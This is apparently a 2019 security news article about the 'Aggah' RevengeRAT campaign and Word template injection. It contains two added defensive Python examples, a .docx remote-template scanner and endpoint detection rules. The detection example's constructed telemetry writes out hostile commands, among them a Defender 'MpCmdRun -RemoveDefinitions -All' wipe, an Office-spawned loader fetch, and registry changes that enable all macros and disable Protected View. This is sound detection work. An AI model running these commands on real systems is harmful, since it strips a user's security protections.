Windows Malware ‘Aggah’ Infects Your PCs Through Microsoft Word Docs

by Cyber360 News
November 11, 2019
in Security

The latest in a series of online attacks is ‘Aggah’, a global malware campaign with roots in the Middle East. The Windows malware is a commodity Trojan, RevengeRAT, spread through a malicious Microsoft Word document. The perpetrators trick users into enabling the document's content so that the malicious code runs and installs RevengeRAT.

Since RevengeRAT is assembled from several open-source Trojan builds, it is very difficult to pinpoint the actual operator. The people involved use the alias ‘haggah’ to carry out their operation.


Windows Malware: How ‘Aggah’ Works

A malware attack in the Aggah campaign consists of three main steps.

  • E-mail a Word document titled ‘Activity.doc’ to the target
  • Prompt the user to click ‘Enable Content’, which lets the document run its macros
  • The macro runs a Shell command that fetches a Blogspot page, from which further malicious scripts are downloaded

The malware in the Aggah campaign works discreetly, through a long chain of stages that is started by that macro.

The Weakness Being Exploited


Microsoft Office Open XML (OOXML) is the XML-based format (.docx, .pptx, .xlsx) that replaced the older binary document formats (.doc, .ppt, .xls).

An OOXML file is a ZIP archive made up of ‘parts’ (XML files and other resources) which together render the document when it is opened.

How the parts fit together is described by relationship (‘.rels’) parts, and a relationship may point at a resource outside the archive by URL, for example the template a document is attached to. Attackers exploit this: whenever such a document is opened, Word fetches the referenced resource, so a remote, attacker-controlled template carrying macros can be loaded into an otherwise harmless-looking document. This is Template Injection.

Template Injection Definition

Template Injection is the technique of pointing a document's attached-template reference at an attacker-controlled server, so that when an unsuspecting user opens the document (which itself contains no macros and passes a casual inspection) Office downloads the malicious template and injects its code into the document.
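The following is an added example, not code from the article or from Unit 42, of a scanner that inspects a .docx for the relationship Template Injection abuses. It builds two small documents in memory (constructed samples; the remote URL is a placeholder, not an indicator from the campaign) and checks every .rels part for an attachedTemplate relationship whose TargetMode is External and whose target is an HTTP, FTP or UNC location. A template reference to a local file is reported separately rather than flagged, because a document attached to a local Normal.dotm looks the same except for the target.

```python
"""Scan an OOXML (.docx) package for remote attached-template relationships.

Added example; the sample documents are constructed in memory and carry
just enough parts to be a structurally valid package.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
ATTACHED_TEMPLATE = OFFICE_REL + "attachedTemplate"
HYPERLINK = OFFICE_REL + "hyperlink"
# A target Word would fetch off-host: a URL scheme or a UNC path (\\server\share).
REMOTE_TARGET = re.compile(r"^(https?://|ftp://|\\\\)", re.IGNORECASE)


def scan_relationships(docx_bytes):
    """Return every external, non-hyperlink relationship in the package.

    Each finding is a dict with part, rel_id, rel_type, target and verdict:
      remote-template  attachedTemplate pointing off-host (Template Injection)
      local-template   attachedTemplate pointing at a local file (normal for Normal.dotm)
      external-ref     any other external relationship, worth a second look
    Hyperlinks are external by design and are not reported.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "")
                if rel_type == HYPERLINK:
                    continue
                target = rel.get("Target", "")
                if rel_type == ATTACHED_TEMPLATE:
                    verdict = "remote-template" if REMOTE_TARGET.match(target) else "local-template"
                else:
                    verdict = "external-ref"
                findings.append({"part": part, "rel_id": rel.get("Id"),
                                 "rel_type": rel_type.rsplit("/", 1)[-1],
                                 "target": target, "verdict": verdict})
    return findings


def is_template_injection(docx_bytes):
    """True if any attached template would be fetched from a remote location."""
    return any(f["verdict"] == "remote-template" for f in scan_relationships(docx_bytes))


# Minimal parts for a constructed .docx; only the settings relationships vary per sample.
CONTENT_TYPES = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
    '</Types>')
ROOT_RELS = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>
</Relationships>'''
DOCUMENT_XML = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>Please enable content to view this document.</w:t></w:r></w:p></w:body>'
    '</w:document>')
SETTINGS_XML = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<w:attachedTemplate r:id="rId1"/></w:settings>')


def build_sample_docx(template_target):
    """Construct a minimal .docx whose attached template points at template_target."""
    settings_rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{template_target}" TargetMode="External"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/settings.xml", SETTINGS_XML)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


# Constructed samples; the remote URL is a placeholder, not an indicator from the campaign.
INJECTED_DOCX = build_sample_docx("http://templates.example/Activity.dotm")
BENIGN_DOCX = build_sample_docx("file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm")

if __name__ == "__main__":
    for label, blob in (("injected", INJECTED_DOCX), ("benign", BENIGN_DOCX)):
        print(label, is_template_injection(blob), scan_relationships(blob))
```

The scanner walks every .rels part rather than only word/_rels/settings.xml.rels, so an external relationship hidden in another part is still surfaced as external-ref; run it on a real sample by replacing the constructed bytes with the contents of the file.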

The latest Windows malware uses the following steps to exploit the above-mentioned feature:

  1. The user receives an E-mail titled ‘Your account is locked’ with a Word document ‘Activity.doc’ attached.

    SHA256 of ‘Activity.doc’ file

    5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f

  2. The document displays an image asking the user to ‘view in desktop’, ‘Enable editing’ and ‘Enable Content’.
  3. Enabling content is the attacker's goal. Using Template Injection, the document then fetches and loads an OLE document from a remote server, which contains an RTF (Rich Text Format) file.
  4. The RTF carries an embedded Excel sheet containing a heavily obfuscated macro that runs a Shell command to fetch a URL.
  5. The Shell command downloads the contents of that URL, a Blogspot page.
  6. The Blogspot page contains several embedded scripts that disable Microsoft Defender by removing its signature definitions and also disable MS Office security functions.
  7. The script then sets the macro security registry values of the MS Office apps to 1, which enables all macros without prompting.
  8. After that, the script disables Microsoft Office Protected View.
  9. The script uses Pastebin to download the final malicious code and run Shell commands.
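To show what steps 5 to 8 look like from the defender's side, here is an added example, not code from the article or from Unit 42, of detection logic run over a handful of constructed endpoint events (process creations and registry value sets, shaped like EDR or Sysmon telemetry; the hosts, paths and command lines are illustrative, not campaign indicators). The mapping of the article's "registry values set to 1" onto VBAWarnings (the Office macro security level, where 1 means enable all macros) and the Disable…InPV values under Security\ProtectedView, and of "changing the Defender signature" onto a Windows Defender MpCmdRun.exe run with -RemoveDefinitions, is the example's own assumption; the article does not name the values or the command.

```python
"""Detection rules for an Aggah-style macro chain, over constructed telemetry.

Added example. Event shapes, paths and values are illustrative; the registry
value names and the MpCmdRun flag are assumptions about how the article's
steps show up on an endpoint, not details taken from the campaign.
"""
import re

# Constructed endpoint telemetry: a Word-spawned shell fetching a Blogspot page, a
# benign Word child, macro-security and Protected View tampering by a script host,
# an unrelated Office registry write, and a Defender definition wipe.
SAMPLE_EVENTS = [
    {"kind": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c start "" "http://some-blog.blogspot.com/p/loader.html"'},
    {"kind": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 12288"},  # benign print helper
    {"kind": "registry", "process": r"C:\Windows\System32\wscript.exe",
     "path": r"HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", "value": 1},
    {"kind": "registry", "process": r"C:\Windows\System32\wscript.exe",
     "path": r"HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV",
     "value": 1},
    {"kind": "registry", "process": r"C:\Windows\explorer.exe",
     "path": r"HKCU\Software\Microsoft\Office\16.0\Word\Options\BackgroundOpen", "value": 1},  # benign
    {"kind": "process", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All'},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Public blog/paste services the article names as staging points for the next stage.
STAGING_HOSTS = ("blogspot.com", "pastebin.com")
# Assumed value names (see lead-in): VBAWarnings=1 enables all macros; Disable*InPV=1
# turns off a Protected View trigger.
MACRO_SECURITY_RE = re.compile(
    r"\\Software\\Microsoft\\Office\\[\d.]+\\(\w+)\\Security\\VBAWarnings$", re.IGNORECASE)
PROTECTED_VIEW_RE = re.compile(
    r"\\Software\\Microsoft\\Office\\[\d.]+\\(\w+)\\Security\\ProtectedView\\(Disable\w+InPV)$",
    re.IGNORECASE)
DEFENDER_DEFS_RE = re.compile(r"MpCmdRun\.exe.*-RemoveDefinitions", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule, detail) alerts, in event order, for events matching a chain step."""
    alerts = []
    for ev in events:
        if ev["kind"] == "process":
            parent = basename(ev["parent"])
            urls = URL_RE.findall(ev["cmdline"])
            if parent in OFFICE_APPS and urls:
                hosts = [u.split("/")[2].lower() for u in urls]
                staged = any(h.endswith(STAGING_HOSTS) for h in hosts)
                rule = "office_child_fetches_staging_site" if staged else "office_child_with_url"
                alerts.append((rule, f"{parent} -> {basename(ev['image'])}: {urls[0]}"))
            if DEFENDER_DEFS_RE.search(ev["cmdline"]):
                alerts.append(("defender_definitions_removed", ev["cmdline"]))
        elif ev["kind"] == "registry":
            m = MACRO_SECURITY_RE.search(ev["path"])
            if m and ev["value"] == 1:
                alerts.append(("macro_security_lowered",
                               f"{m.group(1)} VBAWarnings=1 by {basename(ev['process'])}"))
            m = PROTECTED_VIEW_RE.search(ev["path"])
            if m and ev["value"] == 1:
                alerts.append(("protected_view_disabled",
                               f"{m.group(1)} {m.group(2)}=1 by {basename(ev['process'])}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule:36} {detail}")
```

The Office-parent rule fires on any child command line carrying a URL and only upgrades to the staging-site variant for the hosts the article names, so it still catches a campaign that moves its loader off Blogspot; the benign splwow64 child and the unrelated Office option write produce nothing.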

This malware campaign is targeting financial institutions, government bodies, educational institutions, marketing agencies, and others.

The Windows malware campaign was spotted by Unit 42, the threat research team of Palo Alto Networks.

How To Stay Safe

Currently, it is advised not to open any Word document resembling the one described above. Do not click ‘Enable Content’ in MS Word, and open suspicious documents only in a viewer that cannot run macros, such as Word for the web in Office 365 (the desktop Office 365 apps can still run macros once content is enabled).

Malware attacks have risen significantly in recent years. From pirated Game of Thrones episodes to Microsoft Word documents, anything capable of drawing heavy traffic is being laced with malware.

Several ransomware families have also caused havoc, particularly in the industrial engineering sector, causing hundreds of thousands of dollars in damage. On top of that, new types of ransomware are on the rise, disguising themselves as PC-enhancing mods while encrypting the user's files.


In today’s fast-evolving threat landscape, the best advice is to stay one step ahead.
